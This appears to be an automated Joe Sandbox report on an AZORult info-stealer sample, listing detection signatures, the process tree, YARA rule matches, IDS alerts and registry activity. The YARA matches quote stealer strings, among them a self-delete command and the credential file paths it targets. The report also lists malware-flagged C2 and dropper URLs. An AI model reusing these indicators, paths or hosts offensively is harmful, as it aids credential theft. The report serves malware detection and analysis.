Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ETVk1yP43q.exe

Overview

General Information

Sample name:ETVk1yP43q.exe
renamed because original name is a hash value
Original sample name:56ecf4355112dcd2f73e04d0d1784178.exe
Analysis ID:1583137
MD5:56ecf4355112dcd2f73e04d0d1784178
SHA1:6ba04b9f47530333b9dda9ed424cdbf418896081
SHA256:0b2cb44ca93dc45f099ad395ff46b2e9475e539ac8aa5a362e07f5f9f72425f6
Tags:AZORultexeuser-abuse_ch
Infos:

Detection

AZORult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected AZORult Info Stealer
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Azorult
Yara detected Azorult Info Stealer
Yara detected Generic Dropper
Binary is likely a compiled AutoIt script file
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Tries to detect virtualization through RDTSC time measurements
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a global mouse hook
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ETVk1yP43q.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\ETVk1yP43q.exe" MD5: 56ECF4355112DCD2F73E04D0D1784178)
    • cexplorer.exe (PID: 6888 cmdline: "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: B2E5A8FE3CA4F0CD681B5662F972EA5F)
      • cexplorer.tmp (PID: 3320 cmdline: "C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp" /SL5="$4040E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- MD5: 729BC0108BCD7EC083DFA83D7A4577F2)
        • ChameleonExplorer.exe (PID: 3848 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister MD5: 92A3D0847FC622B31F2D0C273A676C0E)
        • ChameleonExplorer.exe (PID: 928 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer MD5: 92A3D0847FC622B31F2D0C273A676C0E)
        • ChameleonFolder.exe (PID: 5216 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
        • ChameleonExplorer.exe (PID: 1908 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update MD5: 92A3D0847FC622B31F2D0C273A676C0E)
    • update.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Roaming\update.exe" MD5: 912B031EAEE45A05000F7DE4E9B734BC)
      • update.exe (PID: 6332 cmdline: C:\Users\user\AppData\Roaming\update.exe" MD5: 912B031EAEE45A05000F7DE4E9B734BC)
  • ChameleonFolder.exe (PID: 5776 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
    • ChameleonFolder64.exe (PID: 4476 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276 MD5: 246AAA95ABDDFD76F9166A2DAA9F2D73)
  • ChameleonExplorer.exe (PID: 4364 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)
    • ChameleonFolder.exe (PID: 5024 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 6064 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 3228 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 3732 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonExplorer.exe (PID: 6284 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup MD5: 92A3D0847FC622B31F2D0C273A676C0E)
  • ChameleonFolder.exe (PID: 7012 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • ChameleonFolder.exe (PID: 7096 cmdline: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" MD5: 5B0AE3FAC33C08145DCA4A9C272EBC34)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backupJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dllJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
            • 0x193f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
            • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
            • 0xdcac:$a3: %TEMP%\curbuf.dat
            • 0x18dd0:$a4: PasswordsList.txt
            • 0x14128:$a5: Software\Valve\Steam
            00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
            • 0x17373:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
            • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
            00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              21.2.update.exe.400000.0.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                21.2.update.exe.400000.0.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
                  21.2.update.exe.400000.0.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
                  • 0x193f0:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
                  • 0xd564:$a2: %APPDATA%\.purple\accounts.xml
                  • 0xdcac:$a3: %TEMP%\curbuf.dat
                  • 0x18dd0:$a4: PasswordsList.txt
                  • 0x14128:$a5: Software\Valve\Steam
                  21.2.update.exe.400000.0.unpackAzorult_1Azorult Payloadkevoreilly
                  • 0x17373:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
                  • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
                  21.2.update.exe.29d6000.1.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                    Click to see the 7 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe, ProcessId: 928, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chameleon Explorer
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-02T02:27:06.133438+010020283713Unknown Traffic192.168.2.449730104.21.79.229443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-02T02:28:17.624409+010020294651Malware Command and Control Activity Detected192.168.2.44985492.63.192.6380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-02T02:28:17.624409+010028102761Malware Command and Control Activity Detected192.168.2.44985492.63.192.6380TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: ETVk1yP43q.exeAvira: detected
                    Source: https://2no.co/1dHC37Avira URL Cloud: Label: malware
                    Source: http://92.63.192.63/index.phpAvira URL Cloud: Label: malware
                    Source: https://2no.co/redirect-Avira URL Cloud: Label: malware
                    Source: https://2no.co/1dHC37BAvira URL Cloud: Label: malware
                    Source: https://2no.co:443/1dHC37UsersAvira URL Cloud: Label: malware
                    Source: https://2no.co/Avira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Roaming\update.exeAvira: detection malicious, Label: HEUR/AGEN.1362414
                    Source: C:\Users\user\AppData\Roaming\update.exeReversingLabs: Detection: 79%
                    Source: ETVk1yP43q.exeReversingLabs: Detection: 68%
                    Source: ETVk1yP43q.exeVirustotal: Detection: 59%Perma Link
                    Source: ETVk1yP43q.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_0040A610 CryptUnprotectData,LocalFree,21_2_0040A610
                    Source: ETVk1yP43q.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.16.212:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\* source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbJ source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C: (x8C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\*V@E source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdbX source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb( source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbP source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbp source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb` source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdbk source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb* source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb\*Y source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb1 source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: leonExplorerntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
